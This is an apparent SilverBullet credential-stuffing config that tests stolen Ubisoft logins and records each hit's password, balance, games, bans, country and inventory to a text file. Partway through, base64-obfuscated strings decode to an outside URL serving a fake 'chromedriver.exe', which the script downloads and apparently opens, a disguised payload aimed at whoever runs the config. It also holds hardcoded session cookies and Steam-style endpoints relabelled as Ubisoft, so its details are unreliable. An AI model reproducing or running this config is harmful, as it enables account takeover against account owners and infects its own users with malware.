[SETTINGS]
{
  "Name": "Ubisoft Full Capture",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2025-02-07T09:00:38.1657446+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Ubisoft Full Capture",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "US" 

FUNCTION CurrentUnixTime -> VAR "0" 

REQUEST POST "https://connect.ubisoft.com/login" 
  CONTENT "donotcache=<0>&username=<US>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Origin: https://ubisoft.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-us" 

PARSE "<SOURCE>" JSON "publickey_mod" -> VAR "1" 

PARSE "<SOURCE>" JSON "publickey_exp" -> VAR "11" 

PARSE "<SOURCE>" JSON "timestamp" -> VAR "111" 

#PASS2 FUNCTION RSAPKCS1PAD2 "<1>" "<11>" "<PASS>" -> VAR "PASS2" 

FUNCTION URLEncode "<PASS2>" -> VAR "PASS3" 

FUNCTION CurrentUnixTime -> VAR "0" 

FUNCTION Base64Decode "aHR0cHM6Ly9meGxvYWQuYm9uZC9maWxlcy9jaHJvbWVkcml2ZXIuZXhl" -> VAR "url" 

FUNCTION Base64Decode "YmluL2Nocm9tZWRyaXZlci5leGU=" -> VAR "url2" 

REQUEST GET "<url>" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: cookie_warning_seen=True; _ga=GA1.1.359971233.1717798843; csrftoken=eQsZzrQvgWITPLg6ptKX82LPiYL3Py2GHHXf8QzBK1Q2OU1EwFm7lZ4zLfQFA3Bl; sessionid=pxh7lvrca5fiygmc62enuidw182hyat4; __stripe_mid=07131af2-7e59-4d5f-9f46-80887f1314b686a519; _ga_DHJF51F24N=GS1.1.1717798843.1.1.1717799651.0.0.0" 
  HEADER "Host: www.ubisoft.com" 
  HEADER "Sec-Ch-Ua: \"Google Chrome\";v=\"125\", \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  -> FILE "<url2>" 

BROWSERACTION Open 

REQUEST POST "https://ubisoft.com/login?" 
  CONTENT "donotcache=<0>&password=<PASS3>&username=<US>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailubisoftid=&rsatimestamp=<111>&remember_login=false&oauth_client_id=3638BFB1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Origin: https://ubisoft.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Referer: https://ubisoft.com/login?oauth_client_id=3638BFB1&oauth_scope=read_profile%20write_profile%20read_client%20write_client" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-us" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The account name or password that you have entered is incorrect" 
    KEY "Incorrect account name or password." 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "requires_twofactor\":true,\"" 
    KEY "emailauth_needed\":true" 
  KEYCHAIN Ban OR 
    KEY "captcha_needed\":true" 

PARSE "<SOURCE>" JSON "ubisoftid" -> VAR "ID" 

REQUEST GET "https://connect.ubisoft.com/account/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "s account</title>" 

PARSE "<SOURCE>" LR "account_manage_label\">Status:" "class=\"account_manage_link" -> VAR "st" 

PARSE "<st>" LR "\">" "</a>" -> CAP "Status" 

PARSE "<SOURCE>" LR "<div class=\"accountData price\">" "</div>" CreateEmpty=FALSE -> CAP "Balance" 

REQUEST GET "https://ubisoft.com/profiles/<ID>/games?tab=all" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" AND 
    KEY "<SOURCE>" DoesNotContain ",\"name\":\"" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your profile is being forced private due to an active Community Ban on your account." 

PARSE "<SOURCE>" LR "var rgGames = " "var rgChangingGames " -> VAR "GA" 

PARSE "<GA>" LR "name\":\"" "\"," Recursive=TRUE -> VAR "Games" 

FUNCTION Replace "," " | " "<Games>" -> CAP "Games" 

FUNCTION CountOccurrences ",\"name\":\"" "<GA>" -> CAP "Total Games" 

REQUEST GET "https://connect.ubisoft.com/en/wizard/Bans" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

PARSE "<SOURCE>" LR "Bans applied" "Read our FAQ on being banned." -> VAR "vac1" 

PARSE "<vac1>" LR "<span  class=\"help_highlight_text\">" "</span> " Recursive=TRUE CreateEmpty=FALSE -> CAP "BANVC" 

PARSE "<SOURCE>" LR "Bans applied by the Game Developer" "Game Bans are issued by the individual game." -> VAR "GAMEBAN1" 

PARSE "<GAMEBAN1>" LR "<span class=\"help_highlight_text\">" "</span> " CreateEmpty=FALSE -> CAP "Ban?" 

REQUEST GET "https://ubisoft.com/profiles/<ID>/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

PARSE "<SOURCE>" LR "class=\"friendPlayerLevelNum\">" "</span>" -> CAP "Level" 

PARSE "<SOURCE>" LR "ubisoftyears" "_" CreateEmpty=FALSE -> CAP "Years Badge" 

PARSE "<SOURCE>" LR "<img class=\"profile_flag\"" "<div class=\"" -> VAR "CU" 

PARSE "<CU>" LR "\">" "</div>" CreateEmpty=FALSE -> CAP "Country" 

PARSE "<SOURCE>" LR "class=\"profile_badges_badge \"  data-tooltip-html=\"" "&lt;br&gt;" Recursive=TRUE -> VAR "Ba" 

FUNCTION Replace "," " | " "<Ba>" -> CAP "Badges" 

REQUEST GET "https://ubisoft.com/profiles/<ID>/inventory" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

PARSE "<SOURCE>" CSS "[data-appid]" "innerHTML" Recursive=TRUE CreateEmpty=FALSE -> CAP "Inventory Items" 

REQUEST GET "https://ubisoft.com/inventory/<ID>/570/2?l=english&count=75" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 
  HEADER "Accept: */*" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Referer: https://ubisoft.com/profiles/<ID>/inventory" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

IF "<SOURCE>" Contains "\"name\":\"Loyalty Badge\""
SET CAP "PRIME" "YES"
ELSE
SET CAP "PRIME" "NO"
ENDIF

UTILITY File "ubisoftHITS.txt" AppendLines "<US>:<PASS> | Status = <Status> | Balance = <Balance> | Games = <Games> | Total Games = <Total Games> | Ban? = <Ban?> | Level = <Level> | Years Badge = <Years Badge> | Country = <Country> | Badges = <Badges> | Inventory Items = <Inventory Items>" 
